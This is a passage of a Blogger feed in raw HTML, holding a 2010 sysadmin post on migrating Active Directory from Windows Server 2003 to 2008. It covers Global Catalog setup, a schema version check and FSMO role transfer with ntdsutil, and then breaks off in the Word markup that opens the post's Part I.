style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:12pt;"  &gt;&lt;span style="font-size:130%;"&gt;C/&lt;/span&gt;&lt;span style=";font-size:130%;" &gt; &lt;/span&gt;&lt;span style="font-size:130%;"&gt;Make New Server a Global Catalogue for AD &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt; text-align: justify;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;To make New server a Global Catalouge &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; AD Sites and Servces &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Default first Site name &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Servers &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Select the New server Expand &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; NTDS Settings &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Properties Tick on Global Catlouge.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:12pt;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:12pt;"  &gt;&lt;span style="font-size:130%;"&gt;D/&lt;/span&gt;&lt;span style=";font-size:130%;" &gt; &lt;/span&gt;&lt;span style="font-size:130%;"&gt;Extend Active Directory Schema Version :-&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;To check current schema version&lt;span style=""&gt;  &lt;/span&gt;&lt;/span&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoListParagraph" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Start &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Run &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; regedit &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;HKEY_Local_Machine\Systems\currentcontrolset\services\NTDS\Parameters&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Click on “Schema Version” it should be 41 or 47.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="text-indent: 9pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;span style="font-size:130%;"&gt;E/&lt;/span&gt;&lt;span style=";font-size:130%;" &gt;  &lt;/span&gt;&lt;span style="font-size:130%;"&gt;Transfer Fsmo role from Old server to new server :-&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;To demote Old server and transfer all roles to make new server as Primary Domain Controller and Global Catalogue.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;b style=""&gt;&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:13pt;"  &gt;&lt;span style=""&gt;       &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=";font-family:&amp;quot;;" &gt;First point all the Additional Domain controllers to the new Server for secondary DNS Server. To perform this steps please change the secondary IP Address in Network properties on all Additional domain controller.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 9pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Now perform/Run the following commands on the new server in order to transfer all FSMO role to new server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpFirst" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Start &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; Run &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; cmd Type&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#ntdsutil (press Enter you will see &lt;span style="background: yellow none repeat scroll 0% 0%; -moz-background-clip: border; -moz-background-origin: padding; -moz-background-inline-policy: continuous;"&gt;“&lt;b style=""&gt;ntdsutil:&lt;/b&gt;”&lt;/span&gt; as a command prompt)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#ntdsutil: roles&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#fsmo maintenance:?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#fsmo maintenance: connections&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#server connections:?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#server connections: connect to domain domainname.local {check it should Bind and Connected to New Server}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#server connections: connect to server &lt;new&gt;{It should notify us by “Connected to server using locally logon credentials}&lt;o:p&gt;&lt;/o:p&gt;&lt;/new&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#Quit&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#fsmo maintenance:?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#fsmo maintenance: Transfer infrastructure master {When it’s prompted to to transfer the role to new server please click on “Yes”}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#fsmo maintenance: Transfer naming master&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#fsmo maintenance: Transfer PDC&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#fsmo maintenance: Transfer RID master&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;è&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#fsmo maintenance: Transfer Schema master&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Now new Windows Server 2008 DC is holding all master roles.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;To check if new server is primary server type the following command:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpMiddle" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;#Net accounts&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraphCxSpLast" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;(Check whether server is Primary or backup, new server should be Primary now.)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Open support tools command prompt and check FSMO role.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Start&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt; All programs &lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Windows support tools&lt;/span&gt;&lt;span style="font-family:Wingdings;"&gt;&lt;span style=""&gt;à&lt;/span&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Command prompt&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;# netdom query fsmo&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 22.5pt; text-indent: -13.5pt;"&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Check all following 5 roles to make sure it is primary DC:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;1&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Infrastructure Master Role&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;2&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Naming Master Role&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;3&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;PDC Master Role&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;4&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;RID&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoListParagraph" style="margin-left: 27pt; text-indent: -18pt; line-height: 10pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;&lt;span style=""&gt;5&lt;span style=";font-family:&amp;quot;;font-size:7pt;"  &gt;      &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=";font-family:&amp;quot;;" &gt;Schema master&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:130%;"  &gt;All 5 Roles should be with New server &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/632842891872466482-3368576505639312846?l=karnavthakar.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://karnavthakar.blogspot.com/feeds/3368576505639312846/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=632842891872466482&amp;postID=3368576505639312846&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3368576505639312846'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/632842891872466482/posts/default/3368576505639312846'/><link rel='alternate' type='text/html' href='http://karnavthakar.blogspot.com/2010/03/upgrademigrationtranstioning-adexchange.html' title='Upgrade/Migration/Transtioning AD/Exchange 2003 Std to Ad/Exchange 2008 Ent. x64 Part II'/><author><name>Karnav Thakar</name><uri>http://www.blogger.com/profile/16259932664427175643</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_ZIjWENX5vtM/TRfkAQnko8I/AAAAAAAAAVk/AZmqYdPXWFc/S220/SAM_0091.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-632842891872466482.post-7640079176573049136</id><published>2010-03-22T11:19:00.000+11:00</published><updated>2010-03-22T11:23:29.758+11:00</updated><title type='text'>Upgrade/Migration/Transitioning AD/Exchange 2003 Std to Ad/Exchange 2008 Ent. x64 Part I</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;o:officedocumentsettings&gt;   &lt;o:relyonvml/&gt;   &lt;o:allowpng/&gt;  &lt;/o:OfficeDocumentSettings&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;link rel="themeData" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///C:%5CUsers%5Ctech%5CAppData%5CLocal%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;EN-AU&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;   &lt;/w:Compatibility&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val="Cambria Math"&gt;    &lt;m:brkbin val="before"&gt;    &lt;m:brkbinsub val="--"&gt;    &lt;m:smallfrac val="off"&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val="0"&gt;    &lt;m:rmargin val="0"&gt;    &lt;m:defjc val="centerGroup"&gt;    &lt;m:wrapindent val="1440"&gt;    &lt;m:intlim val="subSup"&gt;    &lt;m:narylim val="undOvr"&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"&gt;   &lt;w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"&gt;   &lt;w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 1"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 2"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 3"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 4"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 5"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 6"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 7"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 8"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 9"&gt;   &lt;w:lsdexception locked="false" priority="35" qformat="true" name="caption"&gt;   &lt;w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"&gt;   &lt;w:lsdexception locked="false" priority="1" name="Default Paragraph Font"&gt;   &lt;w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"&gt;   &lt;w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"&gt;   &lt;w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"&gt;   &lt;w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful 